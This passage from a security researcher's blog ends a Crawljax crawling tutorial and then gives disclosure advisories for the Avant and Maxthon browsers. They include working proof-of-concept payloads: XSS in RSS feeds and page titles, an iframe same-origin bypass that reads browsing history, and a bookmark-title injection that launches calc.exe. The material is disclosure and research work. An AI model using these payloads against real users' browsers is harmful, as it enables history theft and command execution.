<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTp5dj-rlizQlJvgrEDMvTIk5acTYgKXarKGkGNJEIV9oUQzzwtA5u_XJM2jiLf03xxzu8AFCEmU6Ze2v9oud04uUb7cd6rX1mcMj9KaeXN1JetD0EAkD3TLHz5LRxfKtc-85yE6f71z4/s1600/s8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTp5dj-rlizQlJvgrEDMvTIk5acTYgKXarKGkGNJEIV9oUQzzwtA5u_XJM2jiLf03xxzu8AFCEmU6Ze2v9oud04uUb7cd6rX1mcMj9KaeXN1JetD0EAkD3TLHz5LRxfKtc-85yE6f71z4/s1600/s8.png" /></a></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<span style="line-height: 25px;"><b>Setting crawling for HTML elements</b></span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<span style="line-height: 25px;">The last part allows more granular control on the HTML elements which would be considered by Crawljax. By enabling more HTML elements, it is possible to apply Crawljax logic against more elements. As a consequence, Crawljax session would probably take longer to complete.</span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvV7CdCtYTfXBDm47tZVYCFCo2sZwJl_prwpFD1KzMhXWrpU_Wuld7eetUwYYvo1TMC9QGCYwuT-TCziYcOgSPI2z_GUdBvkdCcZWL7kv6wSRP6rb3yueUibG2_hWZfZQR4MZ9tYNZnKg/s1600/s9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvV7CdCtYTfXBDm47tZVYCFCo2sZwJl_prwpFD1KzMhXWrpU_Wuld7eetUwYYvo1TMC9QGCYwuT-TCziYcOgSPI2z_GUdBvkdCcZWL7kv6wSRP6rb3yueUibG2_hWZfZQR4MZ9tYNZnKg/s1600/s9.png" /></a></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<span style="line-height: 25px;"><b>Generating a report of crawling session</b></span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<span style="line-height: 25px;">The CrawlOverview plugin can be invoked and a folder output needs to be set. At the end of the Crawljax session, the report will be generated under that folder.</span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhn6LgwSXsT4VoQwZxhCOedJgO3YBtZAsY3_SmT0bnV87wIF-PX-FpJwT1cr1_s0tf1HqeWGJo7jpbyueNbRhLU9NoME9ugqzWQdhaTXYX7es6ZgYZ3Rnzy8pTCUnEJme2y0hezx9DBm_I/s1600/s10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhn6LgwSXsT4VoQwZxhCOedJgO3YBtZAsY3_SmT0bnV87wIF-PX-FpJwT1cr1_s0tf1HqeWGJo7jpbyueNbRhLU9NoME9ugqzWQdhaTXYX7es6ZgYZ3Rnzy8pTCUnEJme2y0hezx9DBm_I/s1600/s10.png" /></a></div>
<div>
<span style="line-height: 25px;">An example of CrawOverview output can be seen here: </span><a href="http://crawls.crawljax.com/">http://crawls.crawljax.com/</a></div>
<div>
<br /></div>
Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.com1tag:blogger.com,1999:blog-5593108060941425908.post-68418212842812892602012-12-05T20:32:00.001+01:002012-12-05T20:32:14.046+01:00Avant Browser - Stored Cross Site Scripting - Feed Reader (browser://localhost/lst?*)<br />
<b>Details</b><br />
<br />
Vendor Site: Avant browser (<span style="font-family: "Times New Roman","serif"; font-size: 12pt;">www.avantbrowser.com</span>)<br />
Date: December, 5 2012 – CVE (TBA)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzIQtpw7fuR2NLrgArbWGLQ_fqwcelOj6BMNXE0WTncjhxXNEx7AZuksn5ReGA1U1TErjQ7nWLTRrfN0ZvG8gl4tIhWlA9w4GKMMG1kVw0qEF9azZ-Bnuq2hYQ19cPFB7y9rb4L3xbNyw/s1600/avant_browser_logo.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzIQtpw7fuR2NLrgArbWGLQ_fqwcelOj6BMNXE0WTncjhxXNEx7AZuksn5ReGA1U1TErjQ7nWLTRrfN0ZvG8gl4tIhWlA9w4GKMMG1kVw0qEF9azZ-Bnuq2hYQ19cPFB7y9rb4L3xbNyw/s1600/avant_browser_logo.jpg" /></a></div>
Affected Software: Avant Browser Ultimate 2012 Build 28 and potentially previous versions<br />
Status: Unpatched<br />
Researcher: Roberto Suggi Liverani - <a href="https://twitter.com/malerisch">@malerisch</a><br />
PDF version: <a href="http://www.security-assessment.com/files/documents/advisory/Avant_multiple_vulnerabilities_advisory.pdf">Avant_multiple_vulnerabilities_advisory.pdf</a><br />
<br />
<b><br /></b>
<b>Stored Cross Site
Scripting - Feed Reader (browser://localhost/lst?*)</b><br />
<br />
A malicious user can inject and store arbitrary JavaScript/HTML code via multiple RSS feed elements. Vulnerable elements are the following:<br />
<div class="Verdana9pt">
<o:p></o:p></div>
<div class="Verdana9pt">
<ul>
<li><b><span style="color: red;"><title></span></b> element:<span class="Apple-tab-span" style="white-space: pre;"> </span>JavaScript injection using HTML encoded payload</li>
<li><span style="color: red;"><b><link></b></span> element:<span class="Apple-tab-span" style="white-space: pre;"> </span>JavaScript injection using javascript: pseudouri ( this is rendered in about:blank zone.)</li>
<li><span style="color: red;"><b><description></b></span> element: JavaScript injection using HTML encoded payload</li>
</ul>
</div>
The following table shows an example of malicious RSS feed:<br />
<br />
<i><?xml version='1.0' encoding="ISO-8859-1"?></i><br />
<i><rss version='2.0'></i><br />
<i><channel></i><br />
<i><description>Malerisch.net</description></i><br />
<i><link>http://blog.malerisch.net/</link></i><br />
<i><title>Malerisch.net</title></i><br />
<i><item></i><br />
<i> <title>browser security&gt;&lt;img src=a onerror='alert(1);' ;&gt;</title></i><br />
<i> <link>javascript:alert(window.location);</link></i><br />
<i> <description>07/09/2008 - I have done some research in the area of browser security and presented this argument at the last OWASP NZ meeting.&lt;img src=a onerror='alert(2);';&gt;</i><br />
<i> <span class="Apple-tab-span" style="white-space: pre;"> </span></description></i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span><pubDate>Sun, 07 Sep 2008 12:00:00 GMT</pubDate></i><br />
<i></item></i><br />
<i></channel></i><br />
<i></rss></i><br />
<div>
<br /></div>
<div>
Injection is possible in a single case: user views a malicious feed using Avant Feed Reader built-in component.</div>
<div>
<br /></div>
<div>
The Feed Reader is located at feed:// URI scheme (e.g. feed://localhost/browser/avent/rss.xml) Note that the URL of the feed has to be subscribed to be rendered under the feed: uri. Also, the feed:// uri scheme is mapped to browser://localhost/lst?domain.name/path/to/rss.feed.</div>
<br />
<br />
<b>Exploitation</b><br />
<br />
This vulnerability can be defined as a traditional Stored Cross Site Scripting vulnerability. Although, the injection is rendered within an internal browser zone (mapped to browser://localhost/lst?domain.name/path/to/rss.feed ), invocation of privileged commands appears to not be possible as SOP is correctly applied to the browser:// zone.<br />
<div>
<br />
<b>Video</b></div>
<br />
Avant Browser - Stored Cross Site Scripting - Feed Reader (browser://localhost/lst?*)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/-mShxsspxy8?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<div class="separator" style="clear: both;">
<b>Timeline</b></div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
07/03/2012 - Posted 10 posts to a forum to get a security contact<br />
14/03/2012 - Reception of report confirmed but no further reply<br />
14/03/2012 - Chased them, no reply<br />
03-05/2012 - 2 new releases following the report, one bug silently fixed<br />
12/05/2012 - HITB2012AMS - bug disclosed during <a href="http://www.security-assessment.com/files/documents/presentations/window_shopping_browser_bug_hunting_in_2012_roberto_suggi_liverani_scott_bell.pdf">presentation</a><br />
14/11/2012 - HackPra - bug and exploit module <a href="http://t.co/jJ8cXF9n">presented</a><br />
<br />
<b>Solution</b><br />
<br />
Do not use Avant browser.Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.comtag:blogger.com,1999:blog-5593108060941425908.post-42615803080831833402012-12-05T20:30:00.001+01:002012-12-05T20:30:37.295+01:00Avant Browser - Cross Context Scripting - browser:home - Most Visited And History Tabs<br />
<b>Details</b><br />
<br />
Vendor Site: Avant browser (<span style="font-family: "Times New Roman","serif"; font-size: 12pt;">www.avantbrowser.com</span>)<br />
Date: December, 5 2012 – CVE (TBA)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzIQtpw7fuR2NLrgArbWGLQ_fqwcelOj6BMNXE0WTncjhxXNEx7AZuksn5ReGA1U1TErjQ7nWLTRrfN0ZvG8gl4tIhWlA9w4GKMMG1kVw0qEF9azZ-Bnuq2hYQ19cPFB7y9rb4L3xbNyw/s1600/avant_browser_logo.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzIQtpw7fuR2NLrgArbWGLQ_fqwcelOj6BMNXE0WTncjhxXNEx7AZuksn5ReGA1U1TErjQ7nWLTRrfN0ZvG8gl4tIhWlA9w4GKMMG1kVw0qEF9azZ-Bnuq2hYQ19cPFB7y9rb4L3xbNyw/s1600/avant_browser_logo.jpg" /></a></div>
Affected Software: Avant Browser Ultimate 2012 Build 27 and potentially previous versions<br />
Status: Unpatched<br />
Researcher: Roberto Suggi Liverani - <a href="https://twitter.com/malerisch">@malerisch</a><br />
PDF version: <a href="http://www.security-assessment.com/files/documents/advisory/Avant_multiple_vulnerabilities_advisory.pdf">Avant_multiple_vulnerabilities_advisory.pdf</a><br />
<br />
<br />
<b>Cross Context Scripting – browser:home – Most Visited And History Tabs</b><br />
<br />
A malicious user can inject arbitrary JavaScript/HTML code through the websites visited with the Avant Browser. The code injection is rendered into the both the Most Visited and History tabs within the browser:home page, which displays URL and the title of the page. A malicious user can inject and store JavaScript/HTML content by using the <title> HTML element, as shown in the table below:<br />
<div class="Verdana9pt">
<o:p></o:p></div>
<div class="Verdana9pt">
<br />
<i><title>aaa"><img src=a onerror='var vstr = {value: ""};window.navigator.AFRunCommand(60003, vstr);alert(vstr.value);'></title></i><br />
<br />
Injected payload is rendered in the history item, as shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIMEVTJzL1RwrvhoClKzvFw7sl8TOk0JcSYwWHUceoNyg7Ir1h_gdXd7-26fmzFAk7zuw8v98umYLjBCQ2NqD4GbnLPPbIQVdWrjzpVQgFyWUGNMuzk3blq9-xLWwhYI8k1r50NmEUsLM/s1600/avant_xcs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIMEVTJzL1RwrvhoClKzvFw7sl8TOk0JcSYwWHUceoNyg7Ir1h_gdXd7-26fmzFAk7zuw8v98umYLjBCQ2NqD4GbnLPPbIQVdWrjzpVQgFyWUGNMuzk3blq9-xLWwhYI8k1r50NmEUsLM/s1600/avant_xcs.png" /></a></div>
<br /></div>
<b>Exploitation</b><br />
<br />
This vulnerability can be exploited in several ways depending on the user action. The table below describes two possible scenarios:<br />
<br />
<b>Scenario 1</b><br />
<br />
User visits a malicious web page;<br />
User directly requests browser:home and clicks on “Most Visited” or “History” tab.<br />
<div>
<br /></div>
<div>
<b>Exploit</b></div>
<div>
<br /></div>
<div>
Stored malicious payload will be rendered from the browser: privileged browser zone and so it would be possible to bypass Same Origin Policy (SOP) protections, and access Avant Browser native JavaScript privileged functions which can be invoked from the window.navigator object (e.g. window.navigator.*). Such Avant Browser object interfaces can be used to read browser history, bookmarks, or modify Avant Browser configuration.</div>
<div>
<br /></div>
<div>
<b>Scenario 2</b></div>
<div>
<br /></div>
<div>
Clickjacking attack which tricks a user into clicking the “most visited” or “history” tab of the browser:home page rendered in a hidden iframe.</div>
<div>
<br /></div>
<div>
<b>Exploit</b></div>
<div>
<br /></div>
<div>
In this case, this can be considered a traditional stored Cross Site Scripting vulnerability and SOP is forbids execution of privileged commands.</div>
<div>
<br /></div>
<div>
<b>Video</b></div>
<br />
Avant Browser - Cross Context Scripting - browser:home - Most Visited And History Tabs<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/cHHtsOpYGH4?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<div class="separator" style="clear: both;">
<b>Timeline</b></div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
<br />
07/03/2012 - Posted 10 posts to a forum to get a security contact<br />
14/03/2012 - Reception of report confirmed but no further reply<br />
14/03/2012 - Chased them, no reply<br />
03-05/2012 - 2 new releases following the report, one bug silently fixed<br />
12/05/2012 - HITB2012AMS - bug disclosed during <a href="http://www.security-assessment.com/files/documents/presentations/window_shopping_browser_bug_hunting_in_2012_roberto_suggi_liverani_scott_bell.pdf">presentation</a><br />
14/11/2012 - HackPra - bug and exploit module <a href="http://t.co/jJ8cXF9n">presented</a><br />
<br />
<br />
<b>Solution</b><br />
<br />
Do not use Avant browser.Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.comtag:blogger.com,1999:blog-5593108060941425908.post-562645140795802332012-12-05T20:29:00.002+01:002012-12-05T20:29:26.192+01:00Avant Browser - Same of Origin Policy Bypass - browser:home<div class="separator" style="clear: both; text-align: center;">
</div>
<b>Details</b><br />
<br />
Vendor Site: Avant browser (<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: "Times New Roman"; mso-fareast-language: EN-US;">www.avantbrowser.com</span>)<br />
Date: December, 5 2012 – CVE (TBA)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzIQtpw7fuR2NLrgArbWGLQ_fqwcelOj6BMNXE0WTncjhxXNEx7AZuksn5ReGA1U1TErjQ7nWLTRrfN0ZvG8gl4tIhWlA9w4GKMMG1kVw0qEF9azZ-Bnuq2hYQ19cPFB7y9rb4L3xbNyw/s1600/avant_browser_logo.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzIQtpw7fuR2NLrgArbWGLQ_fqwcelOj6BMNXE0WTncjhxXNEx7AZuksn5ReGA1U1TErjQ7nWLTRrfN0ZvG8gl4tIhWlA9w4GKMMG1kVw0qEF9azZ-Bnuq2hYQ19cPFB7y9rb4L3xbNyw/s1600/avant_browser_logo.jpg" /></a></div>
Affected Software: Avant Browser Ultimate 2012 Build 28 and potentially previous versions<br />
Status: Unpatched<br />
Researcher: Roberto Suggi Liverani - <a href="https://twitter.com/malerisch">@malerisch</a><br />
PDF version: <a href="http://www.security-assessment.com/files/documents/advisory/Avant_multiple_vulnerabilities_advisory.pdf">Avant_multiple_vulnerabilities_advisory.pdf</a><br />
<br />
<br />
<b>Same of Origin Policy Bypass</b><br />
<br />
A malicious user can execute arbitrary JavaScript/HTML code
on the privileged browser:home page from an untrusted web page on Internet
(http:// zone). This is possible by creating an iframe element pointing to the
browser:home page and then invoking privileged commands using a window object
reference to the iframe element, as shown in the example below:<br />
<div class="Verdana9pt">
<o:p></o:p></div>
<div class="Verdana9pt">
<br /></div>
<div class="Verdana9pt">
</div>
<div class="Verdana9pt">
<i><iframe name="test2" src="<b><span style="color: red;">browser:home</span></b>"></iframe></i></div>
<div class="Verdana9pt">
<i><script><b><span style="color: red;">window['test2'].navigator.AFRunCommand(id_of_privileged_command, vstr)</span></b></script></i></div>
<div>
<br /></div>
This code allows interaction from an untrusted zone (http://) to a trusted and privileged zone: browser:home.<br />
<br />
<b>Exploitation</b><br />
<br />
This vulnerability can be exploited in several ways. As the injection point is in the browser: privileged browser zone, it is possible to bypass Same Origin Policy (SOP) protections, and also access Avant Browser native JavaScript privileged functions which can be invoked using the window.navigator object (e.g. window.navigator.*). Such Avant Browser object interfaces can be used to read browser history, bookmarks, or modify Avant Browser configuration. Below, an example of code which allows to read the browser's history is provided.<br />
<br />
<b>Exploit - Stealing browser's history</b><br />
<br />
<i><iframe name="test2" src="<span style="color: red;"><b>browser:home</b></span>"></iframe></i><br />
<i><script> var vstr = {value: ""}; window['test2'].navigator.AFRunCommand(<b><span style="color: red;">60003, vstr</span></b>) alert(vstr.value);</i><br />
<i>//send vstr.value via an img src to another domain </script></i><br />
<div>
<br />
<b>BeEF module</b><br />
<b><br /></b>
A BeEF module has been developed which steals history of the Avant browser. The BeEF module can be found below:<br />
<br />
<a href="https://github.com/malerisch/beef/tree/avant_browser/modules/exploits/avant_steal_history">https://github.com/malerisch/beef/tree/avant_browser/modules/exploits/avant_steal_history</a></div>
<br />
<div>
<b>Video</b></div>
<br />
Avant Browser - BeEF - History Stealing exploit video<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/I4LiSfTmuM0?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<div class="separator" style="clear: both;">
<b>Timeline</b></div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
<br />
07/03/2012 - Posted 10 posts to a forum to get a security contact<br />
14/03/2012 - Reception of report confirmed but no further reply<br />
14/03/2012 - Chased them, no reply<br />
03-05/2012 - 2 new releases following the report, one bug silently fixed<br />
12/05/2012 - HITB2012AMS - bug disclosed during <a href="http://www.security-assessment.com/files/documents/presentations/window_shopping_browser_bug_hunting_in_2012_roberto_suggi_liverani_scott_bell.pdf">presentation</a><br />
14/11/2012 - HackPra - bug and exploit module <a href="http://t.co/jJ8cXF9n">presented</a><br />
<br />
<br />
<b>Solution</b><br />
<br />
Do not use Avant browser.Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.comtag:blogger.com,1999:blog-5593108060941425908.post-43750988241026868382012-12-05T20:28:00.002+01:002012-12-05T20:28:22.532+01:00Maxthon - Incorrect Executable File Handling and Same Origin Policy Implementation<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkFnvyzn4o6esG1y-1F9_INtJdGYK-JERXcwvAbN2y_028UJQZQDsDImXPWs0Nlkaq37TYJ4c3eXxFBMXomtFaGWGqHE2wgOiG9jA_I_pWX8qIfiYgKquwihkSbhDKtN9ySnWRKcc0ck/s1600/maxthon-browser-1.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><br /><br /><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkFnvyzn4o6esG1y-1F9_INtJdGYK-JERXcwvAbN2y_028UJQZQDsDImXPWs0Nlkaq37TYJ4c3eXxFBMXomtFaGWGqHE2wgOiG9jA_I_pWX8qIfiYgKquwihkSbhDKtN9ySnWRKcc0ck/s200/maxthon-browser-1.png" width="200" /></a></div>
<b>Details</b><br />
<br />
Vendor Site: Maxthon (www.maxthon.com)<br />
Date: December, 5 2012 – CVE (TBA)<br />
Affected Software: Maxthon 3.4.5.2000 and previous versions<br />
Status: Patched<br />
Researcher: Roberto Suggi Liverani - <a href="https://twitter.com/malerisch">@malerisch</a><br />
PDF version: <a href="http://www.security-assessment.com/files/documents/advisory/Maxthon_multiple_vulnerabilities_advisory.pdf">Maxthon_multiple_vulnerabilities_advisory.pdf</a><br />
<br />
<br />
<b>Incorrect Executable File Handling</b><br />
<br />
<br />
The way local executable files are handled by the Maxthon browser seems related to the fact that external tools such as Calc, Desktop, and others can be launched from the browser itself. This design is insecure as it allows JavaScript to directly invoke an executable. As shown in previous exploits, this design can aid exploitation by chaining different vulnerabilities at the same time, allowing for arbitrary command execution.<br />
<br />
This vulnerability can be exploited in multiple ways:<br />
<div>
<br />
<b>Scenario 1</b></div>
1.<span class="Apple-tab-span" style="white-space: pre;"> </span>User visits a page which invokes the window.open() function against an executable file – e.g. file:///C:/windows/system32/cmd.exe<br />
2.<span class="Apple-tab-span" style="white-space: pre;"> </span>User unblocks the pop up blocker<br />
<br />
<b>Scenario 1 - Impact</b><br />
The window will open as a new window, SOP is not enforced and this vulnerability would allow arbitrary code execution.<br />
<br />
<b>Scenario 2</b><br />
User is fooled into bookmarking an executable file<br />
<br />
<b>Scenario 2 - Impact</b><br />
Executable is executed directly by Maxthon. User is not prompted to either downloading the executable or discarding the download.<br />
<br />
<b>Scenario 3</b><br />
SOP vulnerability discovered that would allow direct access to file:// zone from an untrusted zone<br />
<br />
<b>Scenario 3 - Impact</b><br />
Arbitrary command execution.<br />
<br />
<br />
<b>Same Of Origin (SOP) Incorrect Implementation</b><br />
<br />
It is possible to bypass Same of Origin of Policy (SOP) by using window.open() method against about: URI scheme. Such URI are mapped to privileged zone mx://res/*. However, by invoking directly against mx://res/, the SOP is applied and access is forbidden. The following table summarises test case conducted with window.open() method:<br />
<ol>
<li>http:// -> file:// - Prompts a popup blocker, if the user allows the pop up, the file:// window is opened.</li>
<li>http:// -> about:* - Spawns a new window</li>
<li>http:// -> mx://res/* - Forbidden by SOP</li>
</ol>
<b>Timeline</b><br />
<br />
13/02/2012 - Bug reported to multiple contacts<br />
21/02/2012 - Reception of report confirmed but no further reply<br />
21/02/2012 - Chased vendors - no reply<br />
12/05/2012 - HITB2012AMS - bug disclosed during <a href="http://www.security-assessment.com/files/documents/presentations/window_shopping_browser_bug_hunting_in_2012_roberto_suggi_liverani_scott_bell.pdf">presentation</a><br />
02/11/2012 - 25 new releases following the report – 2 bugs silently fixed<br />
14/11/2012 - HackPra - bug and exploit module <a href="http://t.co/jJ8cXF9n">presented</a><br />
<br />
<b>Solution</b><br />
<br />
Do not use Maxthon browser.Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.com0tag:blogger.com,1999:blog-5593108060941425908.post-9496920291254481512012-12-05T20:26:00.000+01:002012-12-05T20:26:52.078+01:00Maxthon - Cross Context Scripting (XCS) - Bookmark Toolbar and Bookmark Sidebar<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkFnvyzn4o6esG1y-1F9_INtJdGYK-JERXcwvAbN2y_028UJQZQDsDImXPWs0Nlkaq37TYJ4c3eXxFBMXomtFaGWGqHE2wgOiG9jA_I_pWX8qIfiYgKquwihkSbhDKtN9ySnWRKcc0ck/s1600/maxthon-browser-1.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><br /><br /><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkFnvyzn4o6esG1y-1F9_INtJdGYK-JERXcwvAbN2y_028UJQZQDsDImXPWs0Nlkaq37TYJ4c3eXxFBMXomtFaGWGqHE2wgOiG9jA_I_pWX8qIfiYgKquwihkSbhDKtN9ySnWRKcc0ck/s200/maxthon-browser-1.png" width="200" /></a></div>
<b>Details</b><br />
<br />
Vendor Site: Maxthon (www.maxthon.com)<br />
Date: December, 5 2012 – CVE (TBA)<br />
Affected Software: Maxthon 3.3.3.1000 and previous versions<br />
Status: Patched<br />
Researcher: Roberto Suggi Liverani - <a href="https://twitter.com/malerisch">@malerisch</a><br />
PDF version: <a href="http://www.security-assessment.com/files/documents/advisory/Maxthon_multiple_vulnerabilities_advisory.pdf">Maxthon_multiple_vulnerabilities_advisory.pdf</a><br />
<br />
<br />
<b>Cross Context Scripting</b><br />
<br />
<a href="http://www.gnucitizen.org/blog/cross-context-scripting-with-sage/">Cross Context Scripting</a> (XCS) is a particular code injection attack vector where the injection occurs from an untrusted zone (e.g. Internet) into a privileged browser zone. In this case, it is possible to inject arbitrary JavaScript/HTML code from an untrusted page into Maxthon browser privileged zone - mx://res/*.<br />
<br />
<br />
<b>Description</b><br />
<br />
It is possible to inject JavaScript/HTML payload via the “title” parameter of the “Add to Favorites” form. In Maxthon, bookmark UI security controls are weak and allow a trivial exploitation, even for an attentive user, considering the following factors:<br />
<ul>
<li>window.external.addFavorite() can be invoked in an automated fashion;</li>
<li>The title entry can be tailored to hide the injection payload;</li>
<li>URL of the bookmark can remain legitimate: e.g. www.google.com</li>
</ul>
The following screen shot shows an innocuous looking bookmark title and URL. The URL is correct but the title element contains malicious JavaScript code which is not visible directly.<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcxTywQdKhQU7mm3GkHDlJCbR5ZNi27d5l3N7TXh6Sq6mT_BJPJ_cZm2uQMft689M075QPeeCGeSDapCFopzFNBPp3eN5bwtt0v-R92myaG8Yext9Yr_wYAPyGPub9YLVrplOTAvhoqX4/s1600/addtofavorite.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcxTywQdKhQU7mm3GkHDlJCbR5ZNi27d5l3N7TXh6Sq6mT_BJPJ_cZm2uQMft689M075QPeeCGeSDapCFopzFNBPp3eN5bwtt0v-R92myaG8Yext9Yr_wYAPyGPub9YLVrplOTAvhoqX4/s1600/addtofavorite.png" /></a></div>
<div>
<br /></div>
<div>
<div>
The injected code is rendered at mx://res/sidebar/favorites/index.htm </div>
<div>
<br /></div>
<div>
Injection occurs under the following conditions/actions:</div>
<div>
<ul>
<li>User opens the Favorites sidebar on the left (just clicking on the Star icon, without clicking the malicious bookmark);</li>
<li>User clicks on the bookmark link from the bookmark toolbar;</li>
<li>User navigates to another tab after having added the malicious bookmark.</li>
</ul>
</div>
<div>
<b><br /></b></div>
<div>
<b>Exploitation</b></div>
</div>
<br />
This vulnerability can be exploited in several ways. As the injection point is in the mx://res/ privileged browser zone, it is possible to bypass Same Origin Policy (SOP) protections, and also access Maxthon native JavaScript privileged functions which can be invoked from the Maxthon DOM object (e.g. maxthon.*). Such Maxthon object interfaces can be used to read and write from the file system, as well as execute arbitrary commands, steal stored passwords, or modify Maxthon configuration.<br />
<br />
<b>Malicious Add to Favorite Injection – HTML Source Code</b><br />
<br />
<i><html></i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span><head></i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span><title>Google</title></i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span><head></i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span><script></i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span>evilpayload='location.href="file:///C:/windows/system32/calc.exe";'</i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span>padding="Google - www.google.com"</i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span>padding2=" "</i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span>padding3=" - the best search engine - bookmark now!!!"</i><br />
<i>window.external.addFavorite("www.google.com",padding+"'><scri"+"pt>"+evilpayload+"</"+"script>"+" "+" "+padding+padding3)</i><br />
<i><br /></i>
<i></script></i><br />
<i></head></i><br />
<i><body></i><br />
<i><h3>Maxthon 3.3.3.1000 - Cross Context Scripting via Bookmark (title parameter) - Code Execution PoC</h3></i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span><font size="+1">Roberto Suggi Liverani - <a href="http://blog.malerisch.net">http://blog.malerisch.net</a> - <a href="https://twitter.com/malerisch">@malerisch</a></font></i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span><br>Steps:</i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span><ul></i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span><li>User is prompted to bookmark an innocuous looking bookmark, like the one shown in the middle of the screen. The injected payload can only be seen if the user scrolls on the left of the title element.</i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span><li>User adds the bookmark.</i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span><li>User then clicks on the Star (Favorites) icon or</i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span><li>User clicks on the bookmark link from the bookmark toolbar.</i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span><li>In both cases, calc.exe is executed.</i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span></ul></i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span>The code for the exploit:<br></i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span><code></i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span>evilpayload='location.href="file:///C:/windows/system32/calc.exe";'</i><br />
